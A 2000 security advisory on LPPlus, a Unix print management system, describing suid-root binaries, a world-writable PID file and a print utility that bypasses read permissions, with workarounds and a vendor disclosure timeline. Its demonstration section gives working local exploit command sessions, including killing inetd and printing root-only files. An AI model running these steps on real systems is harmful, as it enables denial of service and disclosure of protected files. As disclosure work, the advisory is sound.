lpplus.txt

` Multiple Security Holes in LPPlus  
---------------------------------  
echo8, 8/23/2000  
  
Summary  
-------  
  
LPPlus is Plus Technologies' print management system for unix. Versions prior  
to v3.3.x have several serious security holes, some of which undermine the   
integrity of the printing subsystem, some of which threaten the security of   
the system on which the product is installed.  
  
Upgrade is available here: mailto:[email protected]  
  
Details  
-------  
  
Hole #1:   
  
Of the 74 binaries that the installer put on my Solaris system, 26 were  
installed suid to root and world-executable. On my linux box, it was 26  
out of 64. Several of these should not be suid-root, or should be  
group-executable only, and carefully restricted.  
  
For example, the following binaries are installed mode 4755 by the  
installer:   
  
$LPHOME/bin/dccsched  
$LPHOME/bin/dcclpdser  
$LPHOME/bin/dccbkst  
$LPHOME/bin/dccshut  
$LPHOME/bin/dcclpdshut  
$LPHOME/bin/dccbkstshut  
  
The first three start the scheduler, LPD server and network status  
daemons, respectively. The next three stop the aforementioned services. In  
the default configuration, all six can be executed by any unprivileged  
user, effectively giving any user on the system the ability to start and  
stop printing services. No checking of userid, group or anything else is  
done prior to execution.   
  
Hole #2:  
  
$LPHOME/system/lpdprocess is created mode 777.   
  
This file contains the process ID of the dcclpdser process. The  
combination of this file's permissions and the fact that dcclpdshut is  
executable by any user allows an unprivileged user to send signal 2  
(SIGINT) to any process on the system. All that's required is for an  
unprivileged user to replace the PID in $LPHOME/system/lpdprocess with the  
PID of their target process and then run $LPHOME/bin/dcclpdshut.  
  
Hole #3:   
  
$LPHOME/bin/dccscan is suid-root and can be executed by any user. It may  
allow an unprivileged user to print files to which he does not have read  
access. The ramifications are fairly obvious: although an unprivileged  
user cannot read /etc/shadow (for example), using this utility, he may be  
able to print it out. In my testing, this worked even when sending to  
printers to which my user was not given any access in the LPPlus security  
configuration (in fact, my test user had no access to ANY printers, or ANY  
LPPlus services).   
  
Some other potential holes:  
  
* if the archive module is installed, $LPHOME/bin/dccasweep can be  
executed by any user. This may undermine the integrity of the archiving  
facility.   
  
* if the web interface is installed, it utilizes a very old beta version  
of apache, and the installation requires that the server (and all of  
its children, which run as nobody out-of-the-box) run as root.   
  
* on the linux system, $LPHOME was created mode 777. Root's umask was set  
to 022. This didn't seem to be the case on the Solaris system, although  
the reason for this may be the different version of LPPLUS rather than the  
different unixes (see below for version info).   
  
Demonstrations  
--------------  
  
Hole #1:   
  
$ id  
uid=600(test) gid=300(users)  
$ ps -ef|grep dcc  
test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc  
root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched  
root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser  
root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst  
$ dccbkstshut  
$ dcclpdshut  
LPD048E Signal sent to dcclpdser to shut down.  
$ dccshut  
LPP054I LP Plus scheduler ordered to shutdown.  
$ ps -ef|grep dcc   
test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc   
$  
  
Hole #2  
  
$ id  
uid=600(test) gid=300(users)  
$ ps -ef|grep inet  
test 26285 26279 0 17:42:42 pts/0 0:00 grep inet  
root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s  
$ cat > $LPHOME/system/lpdprocess  
12276  
^D  
$ dcclpdshut  
LPD048E Signal sent to dcclpdser to shut down.  
$ ps -ef|grep inet  
test 26291 26279 0 17:45:17 pts/0 0:00 grep inet  
$   
  
Hole #3:  
  
# id  
uid=0(root) gid=1(other)  
# ls -alt /root/test  
total 6  
drwx------ 2 root other 512 Sep 5 17:46 .  
-r-------- 1 root other 365 Sep 5 17:46 foo  
drwx------ 3 root other 512 Sep 5 17:46 ..  
# su - test  
Sun Microsystems Inc. SunOS 5.6 Generic August 1997  
$ id  
uid=600(test) gid=300(users)  
$ ls -alt /root/test  
/root/test: Permission denied  
$ dccscan /root/test 30 5 "-dlp0"  
$  
  
# now, go to the printer and wait for the files to come out, or watch them   
# being queued as root, if you have access to dccstat  
  
Vulnerable Versions   
-------------------  
  
3.3.0 for Unix (on Solaris 2.6).   
3.2.1 for Linux (on Redhat 5.2).  
* These are the only versions I had available for testing.  
  
Workarounds  
-----------  
  
At this time, no patches or updated versions are available. However, most  
of the utilities in question either don't need to be suid, or can be  
group-owned by a more restricted group and mode 4750. The web interface  
works fine with a newer version of apache, and the web server does not  
need to run with all the children spawned as root.   
  
The vendor was notified of these problems on 8/24/2000. They did respond,  
confirming the existence of the holes. However, a request for an ETA on an  
updated release or patches has thus far been ignored.   
  
`